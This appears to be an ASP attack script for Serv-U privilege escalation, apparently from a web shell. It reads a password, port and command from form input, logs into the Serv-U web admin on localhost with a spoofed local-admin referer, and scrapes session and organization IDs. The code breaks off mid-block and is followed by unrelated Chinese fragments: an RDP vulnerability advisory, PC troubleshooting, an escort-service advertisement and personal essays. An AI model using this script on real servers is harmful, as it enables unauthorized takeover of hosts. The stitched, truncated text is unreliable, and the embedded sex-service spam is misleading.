<%
Function httpopen(neirong,fangshi, *** ,refer,cookie)
set Http=server.createobject("Microsoft.XMLHTTP")
Http.open fangshi, *** ,false
Http.setrequestheader "Referer",refer
Http.setrequestheader "Content-type","application/x-www-form-urlencoded"
Http.setrequestheader "Content-length",len(neirong)
Http.setrequestheader "User-Agent","Serv-U"
Http.setrequestheader "x-user-agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
If cookie<>"" then
Http.setrequestheader "Cookie",cookie
End If
Http.send neirong
httpopen=bytes2BSTR(Http.responseBody)
set Http=nothing
end Function
Function getmidstr(L,R,str)
int_left=instr(str,L)
int_right=instr(str,R)
If int_left>0 and int_right>0 Then
getmidstr=mid(str,int_left+len(L),int_right-int_left-len(L))
Else
getmidstr="执行的字符串中不包含“"&L&"”或“"&R&"”"
End If
end Function
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr (CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
%>
<%
'----------自定义参数开始-----------
action=Request("action")
loginpass=Request.Form("loginpass")
port=Request("port")
mydomain=Request.Form("mydomain")
path=Request.Form("path")
ftpport = Request.Form("ftpport")
user=Request.Form("user")
pass=Request.Form("pass")
cmd= Request.Form("cmd")
sessionid=Request("sessionid")
organizationId=Request("OrganizationId")
userid=Request("userid")
domainid=Request("domainid")
'----------自定义参数结束-----------
select case action
case 1
returns=httpopen("user=&pword="&loginpass&"&language=zh%2CCN%26","POST","http://127.0.0.1:"&port&"/Web%20Client/Login.xml?Command=Login&Sync=1227081437828","http://127.0.0.1:"&port&"/?Session=39893&Language=zh,CN&LocalAdmin=1","")
sessionid=getmidstr("","",returns)
if sessionid<>"" then
Response.Write "login ok!"&""
Response.redirect "?action=2&sessionid="&sessionid&"&port="&port
else
Response.Write "error!"&""
end if
case 2
call main2()
case 3
returns=httpopen("","POST","http://127.0.0.1:"&port&"/Admin/ServerUsers.htm?Page=1","",sessionid)
organizationIdTemp=mid(returns,instr(returns,"OrganizationUsers.xml&ID="),len("OrganizationUsers.xml&ID=")+15)
organizationId=mid(OrganizationIdTemp,instr(OrganizationIdTemp,"=")+1,instr(OrganizationIdTemp,"""")-instr(OrganizationIdTemp,"=")-1)
if organizationId<>"" then
Response.write "get organizationId "&OrganizationId&" ok!"&""
Response.redirect "?action=4&sessionid="&sessionid&"&port="&port&"&OrganizationId="&OrganizationId
4、修复及缓解建议 利用此漏洞需要满足以下条件: 2.攻击者通过RDP向目标系统远程桌面服务发送精心设计的请求。 北京时间5月15日,微软发布了针对远程桌面服务的远程执行代码漏洞CVE-2019-07...
电脑上用户数量是非常多,坚信大部分盆友在应用笔记本电脑电脑上的情况下全是会碰到电脑蓝屏状况的,假如在打游戏的情况下碰到电脑蓝屏就尤其不舒服了。有的情况下开机便会出現电脑蓝屏,那Dell笔记本开机蓝屏怎...
额~没有登录还不能检查,那就决断注册吧!点击左边的[注册] 菜单进入注册页面,不关键上边的注册,进不去;或 对路由器扫描网站猎手 或许发掘鸡了。 很明显第二个将依据daemon这个权限描述符来回...
“北京洗浴营业了吗?男子的加油站-【朱溶艳】”3:任何形式口头预定视作无效哦亲们,希望你们能理解呢。在线预约项目:高端模特在线预约,兼职高端私人伴游文章版权黄岩商务会所模特招聘声明: 本篇由 明星商...
会计凭证装订虽是件容易的事, 但是想做好或管理别人做好, 还是有一定难度的。作为一个资深会计工作者,结合积累的经验、认真的精神、别人的建议,特对会计凭证装订的步骤进行详细的拆分和说明,总结出会计凭...
不经意间又到初秋,也又到栗子收获的季节,昨日回家,妈妈给装了一大包装袋刚获得的栗子拿了回家,有娘的觉得真棒,年纪再大也还觉得自身是娘一生最爱的人,大家一定要好好爱自己的爸爸妈妈,仅有她们才算是这一...